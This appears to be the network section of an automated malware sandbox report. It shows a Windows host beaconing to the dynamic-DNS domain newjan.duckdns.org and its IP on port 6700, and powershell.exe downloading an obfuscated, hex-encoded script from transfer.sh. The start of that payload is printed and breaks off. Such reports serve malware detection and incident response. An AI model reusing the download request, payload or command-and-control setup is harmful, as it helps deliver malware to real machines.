Sep 14, 2021 16:50:51.943830967 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:51.944261074 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:52.135613918 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:52.137006998 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:52.389292002 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:52.485644102 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:52.501632929 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:52.547367096 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:52.677573919 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:52.677807093 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:52.951981068 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:53.342562914 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:53.343130112 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:53.534312963 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:53.534477949 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:53.725848913 CEST	6700	49857	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:53.766127110 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:54.455106020 CEST	49857	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:58.628534079 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:58.820816040 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:58.821151018 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:58.822329998 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:59.026544094 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:59.027106047 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:59.219461918 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:59.222359896 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:59.471448898 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:59.517914057 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:59.568054914 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:59.610497952 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:59.709676027 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:59.710736036 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:50:59.955617905 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:50:59.955820084 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:00.152946949 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:00.204091072 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:00.395165920 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:00.438755035 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:00.517904997 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:00.768266916 CEST	6700	49858	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:01.517539024 CEST	49858	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:05.680376053 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:05.872698069 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:05.872989893 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:05.873776913 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.076869011 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.077239990 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.271286011 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.272603035 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.518145084 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.518280983 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.631019115 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.673346043 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.709122896 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.709372044 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.864249945 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.907819986 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:06.955931902 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:06.957784891 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:07.152039051 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:07.204826117 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:07.396349907 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:07.439163923 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:07.517746925 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:07.783968925 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:08.413239956 CEST	6700	49859	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:08.454749107 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:08.522321939 CEST	49859	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:12.595392942 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:12.786428928 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:12.787400961 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:12.787906885 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:12.992476940 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:12.992866993 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:13.183942080 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:13.186009884 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:13.443372965 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:13.583848953 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:13.584589958 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:13.775712967 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:13.778548956 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:13.969793081 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:13.969906092 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:14.161119938 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:14.205248117 CEST	49860	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:51:16.531673908 CEST	6700	49860	194.147.140.20	192.168.2.4
Sep 14, 2021 16:51:16.580427885 CEST	49860	6700	192.168.2.4	194.147.140.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 16:47:02.190938950 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:02.225692987 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:21.230611086 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:21.290188074 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:24.483141899 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:24.515486002 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:24.744651079 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:24.773767948 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:24.974857092 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:25.000319958 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:33.898113966 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:33.943666935 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:53.292308092 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:53.351764917 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:54.368256092 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:54.427527905 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:54.518376112 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:54.563863039 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:54.652333975 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:54.683885098 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:54.734683037 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:54.763283014 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:54.996810913 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:55.028434992 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:55.395468950 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:55.422105074 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:55.976546049 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:56.047259092 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:56.605488062 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:56.640269995 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:57.276618958 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:57.308130980 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:57.664729118 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:57.691255093 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:58.026801109 CEST	61721	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:58.052788973 CEST	53	61721	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:59.144218922 CEST	51255	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:59.179199934 CEST	53	51255	8.8.8.8	192.168.2.4
Sep 14, 2021 16:47:59.568181038 CEST	61522	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:47:59.601581097 CEST	53	61522	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:19.073000908 CEST	52337	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:19.099805117 CEST	53	52337	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:29.509757996 CEST	55046	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:29.630673885 CEST	53	55046	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:36.695919037 CEST	49612	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:36.819647074 CEST	53	49612	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:44.881150961 CEST	49285	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:44.907325983 CEST	53	49285	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:50.228991032 CEST	50601	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:50.273114920 CEST	53	50601	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:52.048471928 CEST	60875	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:52.174993992 CEST	53	60875	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:52.236896992 CEST	56448	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:52.274693012 CEST	53	56448	8.8.8.8	192.168.2.4
Sep 14, 2021 16:48:59.529696941 CEST	59172	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:48:59.653062105 CEST	53	59172	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:06.672297955 CEST	62420	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:06.793632030 CEST	53	62420	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:13.770435095 CEST	60579	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:13.901824951 CEST	53	60579	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:20.957566977 CEST	50183	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:20.984271049 CEST	53	50183	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:27.929801941 CEST	61531	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:27.959846973 CEST	53	61531	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:35.147243977 CEST	49228	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:35.270359039 CEST	53	49228	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:42.128025055 CEST	59794	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:42.258428097 CEST	53	59794	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:49.221239090 CEST	55916	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:49.251703024 CEST	53	55916	8.8.8.8	192.168.2.4
Sep 14, 2021 16:49:55.252278090 CEST	52752	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:49:55.376988888 CEST	53	52752	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:02.315313101 CEST	60542	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:02.438591957 CEST	53	60542	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:08.590311050 CEST	60689	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:08.713947058 CEST	53	60689	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:15.550996065 CEST	64206	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:15.675986052 CEST	53	64206	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:23.459199905 CEST	50904	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:23.581187963 CEST	53	50904	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:30.526446104 CEST	57525	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:30.554337978 CEST	53	57525	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:37.503571033 CEST	53814	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:37.538053989 CEST	53	53814	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:44.495588064 CEST	53418	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:44.620029926 CEST	53	53418	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:51.502877951 CEST	62833	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:51.530977011 CEST	53	62833	8.8.8.8	192.168.2.4
Sep 14, 2021 16:50:58.500104904 CEST	59260	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:50:58.626033068 CEST	53	59260	8.8.8.8	192.168.2.4
Sep 14, 2021 16:51:05.553004980 CEST	49944	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:51:05.678261995 CEST	53	49944	8.8.8.8	192.168.2.4
Sep 14, 2021 16:51:12.567164898 CEST	63300	53	192.168.2.4	8.8.8.8
Sep 14, 2021 16:51:12.593041897 CEST	53	63300	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 16:47:21.230611086 CEST	192.168.2.4	8.8.8.8	0xd710	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Sep 14, 2021 16:47:57.664729118 CEST	192.168.2.4	8.8.8.8	0x23b4	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:29.509757996 CEST	192.168.2.4	8.8.8.8	0x8eb7	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:36.695919037 CEST	192.168.2.4	8.8.8.8	0x73bb	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:44.881150961 CEST	192.168.2.4	8.8.8.8	0xc4d3	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:52.048471928 CEST	192.168.2.4	8.8.8.8	0xc7b5	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:59.529696941 CEST	192.168.2.4	8.8.8.8	0x704b	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:06.672297955 CEST	192.168.2.4	8.8.8.8	0xcc2b	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:13.770435095 CEST	192.168.2.4	8.8.8.8	0x6b4f	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:20.957566977 CEST	192.168.2.4	8.8.8.8	0x310	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:27.929801941 CEST	192.168.2.4	8.8.8.8	0xe7	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:35.147243977 CEST	192.168.2.4	8.8.8.8	0x489	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:42.128025055 CEST	192.168.2.4	8.8.8.8	0x5f2b	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:49.221239090 CEST	192.168.2.4	8.8.8.8	0x6b3d	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:55.252278090 CEST	192.168.2.4	8.8.8.8	0x5a50	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:02.315313101 CEST	192.168.2.4	8.8.8.8	0x6034	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:08.590311050 CEST	192.168.2.4	8.8.8.8	0xc3f4	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:15.550996065 CEST	192.168.2.4	8.8.8.8	0x2c0a	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:23.459199905 CEST	192.168.2.4	8.8.8.8	0x45b4	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:30.526446104 CEST	192.168.2.4	8.8.8.8	0x1935	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:37.503571033 CEST	192.168.2.4	8.8.8.8	0xa534	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:44.495588064 CEST	192.168.2.4	8.8.8.8	0xda45	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:51.502877951 CEST	192.168.2.4	8.8.8.8	0x3acf	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:58.500104904 CEST	192.168.2.4	8.8.8.8	0x9845	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:51:05.553004980 CEST	192.168.2.4	8.8.8.8	0x226a	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)
Sep 14, 2021 16:51:12.567164898 CEST	192.168.2.4	8.8.8.8	0x92b	Standard query (0)	newjan.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 14, 2021 16:47:21.290188074 CEST	8.8.8.8	192.168.2.4	0xd710	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Sep 14, 2021 16:47:57.691255093 CEST	8.8.8.8	192.168.2.4	0x23b4	No error (0)	transfer.sh	144.76.136.153	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:29.630673885 CEST	8.8.8.8	192.168.2.4	0x8eb7	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:36.819647074 CEST	8.8.8.8	192.168.2.4	0x73bb	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:44.907325983 CEST	8.8.8.8	192.168.2.4	0xc4d3	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:52.174993992 CEST	8.8.8.8	192.168.2.4	0xc7b5	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:48:59.653062105 CEST	8.8.8.8	192.168.2.4	0x704b	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:06.793632030 CEST	8.8.8.8	192.168.2.4	0xcc2b	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:13.901824951 CEST	8.8.8.8	192.168.2.4	0x6b4f	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:20.984271049 CEST	8.8.8.8	192.168.2.4	0x310	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:27.959846973 CEST	8.8.8.8	192.168.2.4	0xe7	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:35.270359039 CEST	8.8.8.8	192.168.2.4	0x489	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:42.258428097 CEST	8.8.8.8	192.168.2.4	0x5f2b	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:49.251703024 CEST	8.8.8.8	192.168.2.4	0x6b3d	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:49:55.376988888 CEST	8.8.8.8	192.168.2.4	0x5a50	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:02.438591957 CEST	8.8.8.8	192.168.2.4	0x6034	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:08.713947058 CEST	8.8.8.8	192.168.2.4	0xc3f4	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:15.675986052 CEST	8.8.8.8	192.168.2.4	0x2c0a	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:23.581187963 CEST	8.8.8.8	192.168.2.4	0x45b4	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:30.554337978 CEST	8.8.8.8	192.168.2.4	0x1935	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:37.538053989 CEST	8.8.8.8	192.168.2.4	0xa534	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:44.620029926 CEST	8.8.8.8	192.168.2.4	0xda45	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:51.530977011 CEST	8.8.8.8	192.168.2.4	0x3acf	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:50:58.626033068 CEST	8.8.8.8	192.168.2.4	0x9845	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:51:05.678261995 CEST	8.8.8.8	192.168.2.4	0x226a	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 16:51:12.593041897 CEST	8.8.8.8	192.168.2.4	0x92b	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49755	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:47:21 UTC	0	OUT	GET /pNpqqh/yghtf.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2021-09-14 14:47:22 UTC	0	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename="yghtf.txt" Content-Length: 10837 Content-Type: text/plain; charset=utf-8 Retry-After: Tue, 14 Sep 2021 16:47:23 GMT Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 84.17.52.51 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1631630843 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Tue, 14 Sep 2021 14:47:22 GMT Connection: close
2021-09-14 14:47:22 UTC	0	IN	Data Raw: 24 61 61 20 3d 20 22 32 34 3a 2d 3a 34 36 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 33 61 3a 2d 3a 35 63 3a 2d 3a 35 35 3a 2d 3a 37 33 3a 2d 3a 35 34 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 35 3a 2d 3a 34 33 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 34 3a 2d 3a 34 33 3a 2d 3a 35 32 3a Data Ascii: $aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:
2021-09-14 14:47:22 UTC	1	IN	Data Raw: 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 37 32 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 36 66 3a 2d 3a 37 32 3a 2d 3a 37 39 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 35 3a 2d 3a 37 30 3a 2d 3a 36 63 3a 2d 3a 36 31 3a 2d 3a 36 33 3a 2d 3a 36 35 3a 2d 3a 32 38 3a 2d 3a 32 32 3a 2d Data Ascii: 